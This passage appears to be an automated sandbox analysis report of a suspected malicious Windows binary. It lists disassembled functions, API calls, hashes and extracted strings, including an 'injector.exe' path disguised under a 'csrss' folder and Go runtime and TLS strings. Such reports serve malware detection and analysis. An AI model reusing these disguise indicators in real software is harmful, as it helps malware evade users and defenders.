                                                                      • __std_exception_copy.LIBVCRUNTIME ref: 00007FF6148827B8
                                                                        • Part of subcall function 00007FF61488F4EC: RtlPcToFileHeader.KERNEL32(?,?,?,?,?,?,?,?,7FFFFFFFFFFFFFFF,00007FF614889B0E), ref: 00007FF61488F530
                                                                        • Part of subcall function 00007FF61488F4EC: RaiseException.KERNEL32(?,?,?,?,?,?,?,?,7FFFFFFFFFFFFFFF,00007FF614889B0E), ref: 00007FF61488F576
                                                                      Strings
                                                                      Similarity
                                                                      • API ID: ExceptionFileHeaderRaise__std_exception_copy
                                                                      • String ID: ios_base::badbit set$ios_base::eofbit set$ios_base::failbit set
                                                                      • API String ID: 3973727643-1866435925
                                                                      • Opcode ID: 0646b899308f3453d400320ab1734e666a4998a245cbdc518b35f174e8f0a7bc
                                                                      • Instruction ID: 33b794f194a3e81b26556581438f09145b2f2044444e82f8796bad330921746e
                                                                      • Opcode Fuzzy Hash: 0646b899308f3453d400320ab1734e666a4998a245cbdc518b35f174e8f0a7bc
                                                                      • Instruction Fuzzy Hash: CF21DC22A08E4295EA84DF11E8C11A93361EF55BA4F988132DB4D836A6EF3CE196C340
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000023.00000002.926005520.00007FF614881000.00000020.00020000.sdmp, Offset: 00007FF614880000, based on PE: true
                                                                      • Associated: 00000023.00000002.925993366.00007FF614880000.00000002.00020000.sdmp
                                                                      • Associated: 00000023.00000002.926055638.00007FF6148AF000.00000002.00020000.sdmp
                                                                      • Associated: 00000023.00000002.926079895.00007FF6148C3000.00000004.00020000.sdmp
                                                                      • Associated: 00000023.00000002.926093057.00007FF6148C6000.00000002.00020000.sdmp
                                                                      Similarity
                                                                      • API ID: _invalid_parameter_noinfo
                                                                      • String ID: ios_base::failbit set
                                                                      • API String ID: 3215553584-3924258884
                                                                      • Opcode ID: 2fb02fa14cb39cafdb2ac7ce505cebd37662ddc51a353eb412fb7d2a2d8dbfc1
                                                                      • Instruction ID: 9a49d1e84b419f327282a705ad13986ee8ec2fa89c0bd6ee4801cded4496ddaa
                                                                      • Opcode Fuzzy Hash: 2fb02fa14cb39cafdb2ac7ce505cebd37662ddc51a353eb412fb7d2a2d8dbfc1
                                                                      • Instruction Fuzzy Hash: BEA1C122B19E4685FBA08B6094C01BD62E1AF46FF4F684631DE5D97AE8EF7CD446C310
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000023.00000002.926005520.00007FF614881000.00000020.00020000.sdmp, Offset: 00007FF614880000, based on PE: true
                                                                      • Associated: 00000023.00000002.925993366.00007FF614880000.00000002.00020000.sdmp
                                                                      • Associated: 00000023.00000002.926055638.00007FF6148AF000.00000002.00020000.sdmp
                                                                      • Associated: 00000023.00000002.926079895.00007FF6148C3000.00000004.00020000.sdmp
                                                                      • Associated: 00000023.00000002.926093057.00007FF6148C6000.00000002.00020000.sdmp
                                                                      Similarity
                                                                      • API ID: __except_validate_context_record
                                                                      • String ID: csm$csm
                                                                      • API String ID: 1467352782-3733052814
                                                                      • Opcode ID: 1def0d11c4647c162defc29ee4d7443d642b152b28692578d685c6d7b4b99fdf
                                                                      • Instruction ID: 9d0bca9b742f80a7695247dccea7717abd37cf975b9a4271d31ebde7749c3fcf
                                                                      • Opcode Fuzzy Hash: 1def0d11c4647c162defc29ee4d7443d642b152b28692578d685c6d7b4b99fdf
                                                                      • Instruction Fuzzy Hash: CB710332508E8186DBA58F69D09067DBBA0FB82FA8F148535DF8C87A95CF3DE561C701
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000023.00000002.926005520.00007FF614881000.00000020.00020000.sdmp, Offset: 00007FF614880000, based on PE: true
                                                                      • Associated: 00000023.00000002.925993366.00007FF614880000.00000002.00020000.sdmp
                                                                      • Associated: 00000023.00000002.926055638.00007FF6148AF000.00000002.00020000.sdmp
                                                                      • Associated: 00000023.00000002.926079895.00007FF6148C3000.00000004.00020000.sdmp
                                                                      • Associated: 00000023.00000002.926093057.00007FF6148C6000.00000002.00020000.sdmp
                                                                      Similarity
                                                                      • API ID: _invalid_parameter_noinfo
                                                                      • String ID: e+000$gfff
                                                                      • API String ID: 3215553584-3030954782
                                                                      • Opcode ID: f4f137b188e5893866b64892a04e11eec720c8251b34085c1488a3329f5ed9d4
                                                                      • Instruction ID: 994b19d62f24f8de1e648cd09cf48d9aafd1847a64076281111d546b1533d47c
                                                                      • Opcode Fuzzy Hash: f4f137b188e5893866b64892a04e11eec720c8251b34085c1488a3329f5ed9d4
                                                                      • Instruction Fuzzy Hash: A5511762B18FC146E7A98F35D8903696B91E782FA0F488231D79CC7AD5CE2ED444C700
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000023.00000002.926005520.00007FF614881000.00000020.00020000.sdmp, Offset: 00007FF614880000, based on PE: true
                                                                      • Associated: 00000023.00000002.925993366.00007FF614880000.00000002.00020000.sdmp
                                                                      • Associated: 00000023.00000002.926055638.00007FF6148AF000.00000002.00020000.sdmp
                                                                      • Associated: 00000023.00000002.926079895.00007FF6148C3000.00000004.00020000.sdmp
                                                                      • Associated: 00000023.00000002.926093057.00007FF6148C6000.00000002.00020000.sdmp
                                                                      Similarity
                                                                      • API ID: Concurrency::cancel_current_task_invalid_parameter_noinfo_noreturn
                                                                      • String ID: ios_base::failbit set
                                                                      • API String ID: 73155330-3924258884
                                                                      • Opcode ID: b173cbb97e25df18fb4874a723ea1798176f7d9395f438a44dd196d1cacc4d3b
                                                                      • Instruction ID: c5c3975e44382460adc38b1a4aae65d5e76c7b9a3ddc439118559ea3958cf9b4
                                                                      • Opcode Fuzzy Hash: b173cbb97e25df18fb4874a723ea1798176f7d9395f438a44dd196d1cacc4d3b
                                                                      • Instruction Fuzzy Hash: 5041B422718E8355EEA0EF16A5842A96361FB46FE4F544631DF6E87BC6DF3CE0419304
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000023.00000002.926005520.00007FF614881000.00000020.00020000.sdmp, Offset: 00007FF614880000, based on PE: true
                                                                      • Associated: 00000023.00000002.925993366.00007FF614880000.00000002.00020000.sdmp
                                                                      • Associated: 00000023.00000002.926055638.00007FF6148AF000.00000002.00020000.sdmp
                                                                      • Associated: 00000023.00000002.926079895.00007FF6148C3000.00000004.00020000.sdmp
                                                                      • Associated: 00000023.00000002.926093057.00007FF6148C6000.00000002.00020000.sdmp
                                                                      Similarity
                                                                      • API ID: CreateFrameInfo__except_validate_context_record
                                                                      • String ID: csm
                                                                      • API String ID: 2558813199-1018135373
                                                                      • Opcode ID: 1e8bdd6c694ec2b645be78f9d24aec0e2489a08d3f49d285c7cb06928bb6b1a7
                                                                      • Instruction ID: f3c93f23de8b771ecbfc177e3e2eb72809f33c54857b05896197819ab5018f1f
                                                                      • Opcode Fuzzy Hash: 1e8bdd6c694ec2b645be78f9d24aec0e2489a08d3f49d285c7cb06928bb6b1a7
                                                                      • Instruction Fuzzy Hash: 63514073618F4186E6A1EB55E08436D77A0F78ABB5F140534DB8D87B56CF3DE0558B00
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      • _invalid_parameter_noinfo.LIBCMT ref: 00007FF61489B2B6
                                                                        • Part of subcall function 00007FF61489E5E4: HeapFree.KERNEL32(?,?,00007FF61489D60F,00007FF6148A7DC0,?,?,?,00007FF6148A8143,?,?,0000E117BC86E4D3,00007FF6148A8688,?,?,?,00007FF6148A85BB), ref: 00007FF61489E5FA
                                                                        • Part of subcall function 00007FF61489E5E4: GetLastError.KERNEL32(?,?,00007FF61489D60F,00007FF6148A7DC0,?,?,?,00007FF6148A8143,?,?,0000E117BC86E4D3,00007FF6148A8688,?,?,?,00007FF6148A85BB), ref: 00007FF61489E60C
                                                                      • GetModuleFileNameW.KERNEL32(?,?,?,?,?,00007FF61488D849), ref: 00007FF61489B2D4
                                                                      Strings
                                                                      • C:\Users\user\AppData\Local\Temp\csrss\injector\injector.exe, xrefs: 00007FF61489B2C2
                                                                      Memory Dump Source
                                                                      • Source File: 00000023.00000002.926005520.00007FF614881000.00000020.00020000.sdmp, Offset: 00007FF614880000, based on PE: true
                                                                      • Associated: 00000023.00000002.925993366.00007FF614880000.00000002.00020000.sdmp
                                                                      • Associated: 00000023.00000002.926055638.00007FF6148AF000.00000002.00020000.sdmp
                                                                      • Associated: 00000023.00000002.926079895.00007FF6148C3000.00000004.00020000.sdmp
                                                                      • Associated: 00000023.00000002.926093057.00007FF6148C6000.00000002.00020000.sdmp
                                                                      Similarity
                                                                      • API ID: ErrorFileFreeHeapLastModuleName_invalid_parameter_noinfo
                                                                      • String ID: C:\Users\user\AppData\Local\Temp\csrss\injector\injector.exe
                                                                      • API String ID: 3580290477-4022000943
                                                                      • Opcode ID: d07806923a240e9b42c0af4a433109874be1beebc6025e65424fba5256e757d0
                                                                      • Instruction ID: 8c2e856a5737a622234b2f776453d7fa50fee11698f8b7caafbfd1cc55c0d8b7
                                                                      • Opcode Fuzzy Hash: d07806923a240e9b42c0af4a433109874be1beebc6025e65424fba5256e757d0
                                                                      • Instruction Fuzzy Hash: A9415E36A08E5285EB94DF25D4811BD2794FF86FE4B944036EA4E83B85DF3EE841C310
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000023.00000002.926005520.00007FF614881000.00000020.00020000.sdmp, Offset: 00007FF614880000, based on PE: true
                                                                      • Associated: 00000023.00000002.925993366.00007FF614880000.00000002.00020000.sdmp
                                                                      • Associated: 00000023.00000002.926055638.00007FF6148AF000.00000002.00020000.sdmp
                                                                      • Associated: 00000023.00000002.926079895.00007FF6148C3000.00000004.00020000.sdmp
                                                                      • Associated: 00000023.00000002.926093057.00007FF6148C6000.00000002.00020000.sdmp
                                                                      Similarity
                                                                      • API ID: ErrorFileLastWrite
                                                                      • String ID: U
                                                                      • API String ID: 442123175-4171548499
                                                                      • Opcode ID: ef580d635dde8ef3720f0bf036fcd3533ab23aa0b8df9f85e9dd75b1584e7d17
                                                                      • Instruction ID: 802ab13b196758af223a3b8aa683636d27555ef968ed7eb96d19ae53cfebbfac
                                                                      • Opcode Fuzzy Hash: ef580d635dde8ef3720f0bf036fcd3533ab23aa0b8df9f85e9dd75b1584e7d17
                                                                      • Instruction Fuzzy Hash: 2B41B232A18F4182DBA09F25E4843AA77A0FB89BA4F504131EE4DC7798DFBCD441C740
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000023.00000002.926005520.00007FF614881000.00000020.00020000.sdmp, Offset: 00007FF614880000, based on PE: true
                                                                      • Associated: 00000023.00000002.925993366.00007FF614880000.00000002.00020000.sdmp
                                                                      • Associated: 00000023.00000002.926055638.00007FF6148AF000.00000002.00020000.sdmp
                                                                      • Associated: 00000023.00000002.926079895.00007FF6148C3000.00000004.00020000.sdmp
                                                                      • Associated: 00000023.00000002.926093057.00007FF6148C6000.00000002.00020000.sdmp
                                                                      Similarity
                                                                      • API ID: _invalid_parameter_noinfo
                                                                      • String ID: ios_base::failbit set
                                                                      • API String ID: 3215553584-3924258884
                                                                      • Opcode ID: 918c2305aea0f570d03a744ed01c0d7ddd8fad88daa9e012b788a703a79d1063
                                                                      • Instruction ID: 6d86aa3022823995f9d0a123032e8e32ea02965f57fe95f8692e3504eacbb0dd
                                                                      • Opcode Fuzzy Hash: 918c2305aea0f570d03a744ed01c0d7ddd8fad88daa9e012b788a703a79d1063
                                                                      • Instruction Fuzzy Hash: 2731E722A18F5281E7E15A11D5C0279A260FF86FF0F609631DAAC87BE5DF7DE4128701
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000023.00000002.926005520.00007FF614881000.00000020.00020000.sdmp, Offset: 00007FF614880000, based on PE: true
                                                                      • Associated: 00000023.00000002.925993366.00007FF614880000.00000002.00020000.sdmp
                                                                      • Associated: 00000023.00000002.926055638.00007FF6148AF000.00000002.00020000.sdmp
                                                                      • Associated: 00000023.00000002.926079895.00007FF6148C3000.00000004.00020000.sdmp
                                                                      • Associated: 00000023.00000002.926093057.00007FF6148C6000.00000002.00020000.sdmp
                                                                      Similarity
                                                                      • API ID: _handle_errorf
                                                                      • String ID: "$powf
                                                                      • API String ID: 2315412904-603753351
                                                                      • Opcode ID: d592a859933890cdd57d7dbf68ff2918b61bba60df7e98e1b2b9030277a19e82
                                                                      • Instruction ID: 0349652522dac19865302c105cafab63743ad882152677cd4f912efd5c8ecab4
                                                                      • Opcode Fuzzy Hash: d592a859933890cdd57d7dbf68ff2918b61bba60df7e98e1b2b9030277a19e82
                                                                      • Instruction Fuzzy Hash: 03413373D18A80DAD3B0CF22E0847A9B7A0FB9A758F201325F749429E4CFBDD5919B40
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000023.00000002.926005520.00007FF614881000.00000020.00020000.sdmp, Offset: 00007FF614880000, based on PE: true
                                                                      • Associated: 00000023.00000002.925993366.00007FF614880000.00000002.00020000.sdmp
                                                                      • Associated: 00000023.00000002.926055638.00007FF6148AF000.00000002.00020000.sdmp
                                                                      • Associated: 00000023.00000002.926079895.00007FF6148C3000.00000004.00020000.sdmp
                                                                      • Associated: 00000023.00000002.926093057.00007FF6148C6000.00000002.00020000.sdmp
                                                                      Similarity
                                                                      • API ID: _handle_error
                                                                      • String ID: "$pow
                                                                      • API String ID: 1757819995-713443511
                                                                      • Opcode ID: 6600cf8cc386849cdc45c6f3dac13c67aaf6601de347aff380f29c236909c0c2
                                                                      • Instruction ID: 65fd5647c11dbaf26810c0d5db50c4eeaf3f4ce9b48d579d67ef00e4af3191d4
                                                                      • Opcode Fuzzy Hash: 6600cf8cc386849cdc45c6f3dac13c67aaf6601de347aff380f29c236909c0c2
                                                                      • Instruction Fuzzy Hash: 0E311A72D18E8586D7A0CF10E48076AAAB0FFDA758F201325F78946AA4DFBDD1859B10
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000023.00000002.926005520.00007FF614881000.00000020.00020000.sdmp, Offset: 00007FF614880000, based on PE: true
                                                                      • Associated: 00000023.00000002.925993366.00007FF614880000.00000002.00020000.sdmp
                                                                      • Associated: 00000023.00000002.926055638.00007FF6148AF000.00000002.00020000.sdmp
                                                                      • Associated: 00000023.00000002.926079895.00007FF6148C3000.00000004.00020000.sdmp
                                                                      • Associated: 00000023.00000002.926093057.00007FF6148C6000.00000002.00020000.sdmp
                                                                      Similarity
                                                                      • API ID: _set_errno_from_matherr
                                                                      • String ID: exp
                                                                      • API String ID: 1187470696-113136155
                                                                      • Opcode ID: b94ccfe877b480f055c56df4a789eadf792ebadbb8a7197ff8c307239036b53c
                                                                      • Instruction ID: 20fb9e5f25510aafc68ef8c73607e8bdecccfd3a69b59d6a75f7e43d19350b33
                                                                      • Opcode Fuzzy Hash: b94ccfe877b480f055c56df4a789eadf792ebadbb8a7197ff8c307239036b53c
                                                                      • Instruction Fuzzy Hash: 6721FF76A19B458BE7A0DF28A48016A73A0FF8AB10F605535E68DC3B95EF3DD4018F00
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000023.00000002.926005520.00007FF614881000.00000020.00020000.sdmp, Offset: 00007FF614880000, based on PE: true
                                                                      • Associated: 00000023.00000002.925993366.00007FF614880000.00000002.00020000.sdmp
                                                                      • Associated: 00000023.00000002.926055638.00007FF6148AF000.00000002.00020000.sdmp
                                                                      • Associated: 00000023.00000002.926079895.00007FF6148C3000.00000004.00020000.sdmp
                                                                      • Associated: 00000023.00000002.926093057.00007FF6148C6000.00000002.00020000.sdmp
                                                                      Similarity
                                                                      • API ID: CompareStringtry_get_function
                                                                      • String ID: CompareStringEx
                                                                      • API String ID: 3328479835-2590796910
                                                                      • Opcode ID: d62702aeeb23d077d50cf64610e65f1c90e7cdd79556739b61dedc982c1fdc6d
                                                                      • Instruction ID: 6588c136ae506542097cb096e242276764914159202dea43466d6c35bb415e19
                                                                      • Opcode Fuzzy Hash: d62702aeeb23d077d50cf64610e65f1c90e7cdd79556739b61dedc982c1fdc6d
                                                                      • Instruction Fuzzy Hash: 49113E36A08B8186D7A0CF55F4802AAB7A0FB8AB94F544135EE8D83B69CF7CD440CB40
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000023.00000002.926005520.00007FF614881000.00000020.00020000.sdmp, Offset: 00007FF614880000, based on PE: true
                                                                      • Associated: 00000023.00000002.925993366.00007FF614880000.00000002.00020000.sdmp
                                                                      • Associated: 00000023.00000002.926055638.00007FF6148AF000.00000002.00020000.sdmp
                                                                      • Associated: 00000023.00000002.926079895.00007FF6148C3000.00000004.00020000.sdmp
                                                                      • Associated: 00000023.00000002.926093057.00007FF6148C6000.00000002.00020000.sdmp
                                                                      Similarity
                                                                      • API ID: std::_$Locinfo::_Locinfo_ctorLockitLockit::_Yarn
                                                                      • String ID: bad locale name
                                                                      • API String ID: 1838369231-1405518554
                                                                      • Opcode ID: 32b908108cd237eb5cba1e8f9bac981e284d381217bdac2534e43f5b9a6d914e
                                                                      • Instruction ID: 67fd0dbda1aebc8f817285bfab17e8ab46eb3778edb7c0a61aedf3a0a2ff753f
                                                                      • Opcode Fuzzy Hash: 32b908108cd237eb5cba1e8f9bac981e284d381217bdac2534e43f5b9a6d914e
                                                                      • Instruction Fuzzy Hash: 17016D2350AF828AC785DF75A88015D77A5FB59F98B189139CA8CC371AEF38D590C340
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      • RtlPcToFileHeader.KERNEL32(?,?,?,?,?,?,?,?,7FFFFFFFFFFFFFFF,00007FF614889B0E), ref: 00007FF61488F530
                                                                      • RaiseException.KERNEL32(?,?,?,?,?,?,?,?,7FFFFFFFFFFFFFFF,00007FF614889B0E), ref: 00007FF61488F576
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000023.00000002.926005520.00007FF614881000.00000020.00020000.sdmp, Offset: 00007FF614880000, based on PE: true
                                                                      • Associated: 00000023.00000002.925993366.00007FF614880000.00000002.00020000.sdmp
                                                                      • Associated: 00000023.00000002.926055638.00007FF6148AF000.00000002.00020000.sdmp
                                                                      • Associated: 00000023.00000002.926079895.00007FF6148C3000.00000004.00020000.sdmp
                                                                      • Associated: 00000023.00000002.926093057.00007FF6148C6000.00000002.00020000.sdmp
                                                                      Similarity
                                                                      • API ID: ExceptionFileHeaderRaise
                                                                      • String ID: csm
                                                                      • API String ID: 2573137834-1018135373
                                                                      • Opcode ID: 1c1d4edfab81aec74bcfaf235aa39090f944405d8f8c0753ef25d74ea04d033e
                                                                      • Instruction ID: e61553ecc6fdd81c4d84f20367c53742299d95e0c03645c9c500a4adf6d36c72
                                                                      • Opcode Fuzzy Hash: 1c1d4edfab81aec74bcfaf235aa39090f944405d8f8c0753ef25d74ea04d033e
                                                                      • Instruction Fuzzy Hash: D3113A32618B4282EBA18F15E490269B7A5FB89FA4F284231DF8C477A8DF3CD5518B00
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000023.00000002.926005520.00007FF614881000.00000020.00020000.sdmp, Offset: 00007FF614880000, based on PE: true
                                                                      • Associated: 00000023.00000002.925993366.00007FF614880000.00000002.00020000.sdmp
                                                                      • Associated: 00000023.00000002.926055638.00007FF6148AF000.00000002.00020000.sdmp
                                                                      • Associated: 00000023.00000002.926079895.00007FF6148C3000.00000004.00020000.sdmp
                                                                      • Associated: 00000023.00000002.926093057.00007FF6148C6000.00000002.00020000.sdmp
                                                                      Similarity
                                                                      • API ID: DefaultUsertry_get_function
                                                                      • String ID: GetUserDefaultLocaleName
                                                                      • API String ID: 3217810228-151340334
                                                                      • Opcode ID: 7e8f518c8604ffc61f28e03b5f03f992b79c04bb97c4ed7245e07b4e6ae7fe07
                                                                      • Instruction ID: a4c20fc6f92cb157abb9a1c800c9b2da7b68354402ccfab3d502ca10cb6130bc
                                                                      • Opcode Fuzzy Hash: 7e8f518c8604ffc61f28e03b5f03f992b79c04bb97c4ed7245e07b4e6ae7fe07
                                                                      • Instruction Fuzzy Hash: 40F08210B18D8281FBD49B55B6D45F86251AF4AFE4F649035DA0D87BE5DE6CD445C300
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000023.00000002.926005520.00007FF614881000.00000020.00020000.sdmp, Offset: 00007FF614880000, based on PE: true
                                                                      • Associated: 00000023.00000002.925993366.00007FF614880000.00000002.00020000.sdmp
                                                                      • Associated: 00000023.00000002.926055638.00007FF6148AF000.00000002.00020000.sdmp
                                                                      • Associated: 00000023.00000002.926079895.00007FF6148C3000.00000004.00020000.sdmp
                                                                      • Associated: 00000023.00000002.926093057.00007FF6148C6000.00000002.00020000.sdmp
                                                                      Similarity
                                                                      • API ID: CountCriticalInitializeSectionSpintry_get_function
                                                                      • String ID: InitializeCriticalSectionEx
                                                                      • API String ID: 539475747-3084827643
                                                                      • Opcode ID: 3e5e89516c3b208d4de2910388d9803b3dbd8c46d2e262e577940497b006c2ed
                                                                      • Instruction ID: eb6d4de2671e8eae8958d0c8f57778737c28760dad467d56908c695aa1cd0f46
                                                                      • Opcode Fuzzy Hash: 3e5e89516c3b208d4de2910388d9803b3dbd8c46d2e262e577940497b006c2ed
                                                                      • Instruction Fuzzy Hash: 8BF0BE25E18F4181EA848B41F4800A86220BF4AFE0FA89031DA1D43BA9CFBCE946C700
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      • try_get_function.LIBVCRUNTIME ref: 00007FF6148A0FA5
                                                                      • TlsSetValue.KERNEL32(?,?,0000E117BC86E4D3,00007FF61489EF26,?,?,0000E117BC86E4D3,00007FF6148957A9,?,?,?,?,00007FF6148A507E,?,?,00000000), ref: 00007FF6148A0FBC
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000023.00000002.926005520.00007FF614881000.00000020.00020000.sdmp, Offset: 00007FF614880000, based on PE: true
                                                                      • Associated: 00000023.00000002.925993366.00007FF614880000.00000002.00020000.sdmp
                                                                      • Associated: 00000023.00000002.926055638.00007FF6148AF000.00000002.00020000.sdmp
                                                                      • Associated: 00000023.00000002.926079895.00007FF6148C3000.00000004.00020000.sdmp
                                                                      • Associated: 00000023.00000002.926093057.00007FF6148C6000.00000002.00020000.sdmp
                                                                      Similarity
                                                                      • API ID: Valuetry_get_function
                                                                      • String ID: FlsSetValue
                                                                      • API String ID: 738293619-3750699315
                                                                      • Opcode ID: 0d8a84be871c5973d44aa728ee23869030e7b3f8ed9764413539ddc368b6f7a8
                                                                      • Instruction ID: 88f3608733265744941838cf631406958623979b352a306379110684b379dd4a
                                                                      • Opcode Fuzzy Hash: 0d8a84be871c5973d44aa728ee23869030e7b3f8ed9764413539ddc368b6f7a8
                                                                      • Instruction Fuzzy Hash: AAE06561A18E0291EAC55F50E8800B56222EF4AFB4F788136DA1D876E5CEBCE595C310
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Executed Functions

                                                                      Non-executed Functions

                                                                      Strings
                                                                      • runtime: VirtualQuery failed; errno=runtime: bad notifyList size - sync=runtime: inconsistent write deadlineruntime: invalid pc-encoded table f=runtime: invalid typeBitsBulkBarrierruntime: mcall called on m->g0 stackruntime: sudog with non-nil waitlinkruntime:, xrefs: 00428C2C
                                                                      • ,-./0456:;<=>?@BCLMNOPSZ["\, xrefs: 00428BC0
                                                                      • runtime: g0 stack [runtime: insert t= runtime: pcdata is runtime: preempt g0semaRoot rotateLeftskip this directorystopm holding lockssync.Cond is copiedtoo many open filesunknown Go type: %vunknown certificateunknown cipher typeunknown status codeunknown wait , xrefs: 00428B96
                                                                      • VirtualQuery for stack base failedadding nil Certificate to CertPoolcouldn't create a new cipher blockcrypto/aes: invalid buffer overlapcrypto/des: invalid buffer overlapcrypto/rc4: invalid buffer overlapcrypto/rsa: missing public modulusfailed to apply ACL to, xrefs: 00428C60
                                                                      • bad g0 stackbad recoveryc ap trafficc hs trafficcaller errorcan't happencas64 failedcdn is emptychan receiveclose notifycontent-typecontext.TODOdumping heapend tracegcentersyscallexit status failed to %sfailed to %wgcpacertraceget UUID: %wgetaddrinfowhost is , xrefs: 00428C05
                                                                      • ", xrefs: 00428C69
                                                                      Memory Dump Source
                                                                      • Source File: 0000002E.00000002.836135615.0000000000401000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 0000002E.00000002.836125234.0000000000400000.00000002.00020000.sdmp
                                                                      • Associated: 0000002E.00000002.837083640.00000000008C3000.00000040.00020000.sdmp
                                                                      • Associated: 0000002E.00000002.837096061.00000000008D1000.00000040.00020000.sdmp
                                                                      • Associated: 0000002E.00000002.837111983.00000000008D4000.00000040.00020000.sdmp
                                                                      • Associated: 0000002E.00000002.837128757.00000000008D7000.00000040.00020000.sdmp
                                                                      • Associated: 0000002E.00000002.837148813.00000000008D8000.00000080.00020000.sdmp
                                                                      • Associated: 0000002E.00000002.837163997.00000000008D9000.00000004.00020000.sdmp
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: "$,-./0456:;<=>?@BCLMNOPSZ["\$VirtualQuery for stack base failedadding nil Certificate to CertPoolcouldn't create a new cipher blockcrypto/aes: invalid buffer overlapcrypto/des: invalid buffer overlapcrypto/rc4: invalid buffer overlapcrypto/rsa: missing public modulusfailed to apply ACL to$bad g0 stackbad recoveryc ap trafficc hs trafficcaller errorcan't happencas64 failedcdn is emptychan receiveclose notifycontent-typecontext.TODOdumping heapend tracegcentersyscallexit status failed to %sfailed to %wgcpacertraceget UUID: %wgetaddrinfowhost is $runtime: VirtualQuery failed; errno=runtime: bad notifyList size - sync=runtime: inconsistent write deadlineruntime: invalid pc-encoded table f=runtime: invalid typeBitsBulkBarrierruntime: mcall called on m->g0 stackruntime: sudog with non-nil waitlinkruntime:$runtime: g0 stack [runtime: insert t= runtime: pcdata is runtime: preempt g0semaRoot rotateLeftskip this directorystopm holding lockssync.Cond is copiedtoo many open filesunknown Go type: %vunknown certificateunknown cipher typeunknown status codeunknown wait
                                                                      • API String ID: 0-1070706453
                                                                      • Opcode ID: 35bfc13783085809ff100db792aae9c6576bf432ec796ad2e4c0f2543c7307a5
                                                                      • Instruction ID: d05530f15c22603299acca85900aed5cb2d67bbfa8ea3cc37d9bd2921fc2a2af
                                                                      • Opcode Fuzzy Hash: 35bfc13783085809ff100db792aae9c6576bf432ec796ad2e4c0f2543c7307a5
                                                                      • Instruction Fuzzy Hash: E95105B42097118FD340EF29D58575EBBE0FF48708F808A2EE88887352E7389944DF56
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Strings
                                                                      • releasep: m=remote errorruntime: f= runtime: gp=s ap traffics hs trafficshort buffersignature.%stransmitfileunexpected )unknown portwintrust.dllwirep: p->m=wtsapi32.dll != sweepgen MB released MB) workers= called from flushedWork gcscanvalid heap_marked= , xrefs: 00434566
                                                                      • m->p= next= p->m= prev= span=(...), not , val 390625<-chanAcceptAnswerArabicAugustBasic BitBltBrahmiCANCELCarianChakmaCommonCookieCopticDELETEExpectFormatFridayGOAWAYGOROOTGetACPGothicHangulHatranHebrewHyphenKaithiKhojkiLepchaLockedLycianLydianMondayPADDEDPr, xrefs: 00434588
                                                                      • releasep: invalid argruntime: confused by runtime: newstack at runtime: newstack sp=runtime: work.nwait= sequence tag mismatchstale NFS file handlestart copied file: %wstartlockedm: m has pstartm: m is spinningstate not recoverablestopg: invalid statustrace/br, xrefs: 00434662
                                                                      • m->mcache= mallocing= ms clock, nBSSRoots= p->mcache= p->status= pageSize= s.nelems= schedtick= span.list=$WINDIR\rss%!(BADPREC), s.base()=, s.npages=, settings:.WithCancel/dev/stderr/dev/stdout/index.html30517578125: frame.sp=; Max-Age=0<invalid opBad Gat, xrefs: 004345D4
                                                                      Memory Dump Source
                                                                      • Source File: 0000002E.00000002.836135615.0000000000401000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 0000002E.00000002.836125234.0000000000400000.00000002.00020000.sdmp
                                                                      • Associated: 0000002E.00000002.837083640.00000000008C3000.00000040.00020000.sdmp
                                                                      • Associated: 0000002E.00000002.837096061.00000000008D1000.00000040.00020000.sdmp
                                                                      • Associated: 0000002E.00000002.837111983.00000000008D4000.00000040.00020000.sdmp
                                                                      • Associated: 0000002E.00000002.837128757.00000000008D7000.00000040.00020000.sdmp
                                                                      • Associated: 0000002E.00000002.837148813.00000000008D8000.00000080.00020000.sdmp
                                                                      • Associated: 0000002E.00000002.837163997.00000000008D9000.00000004.00020000.sdmp
                                                                      Similarity
                                                                      • API ID:
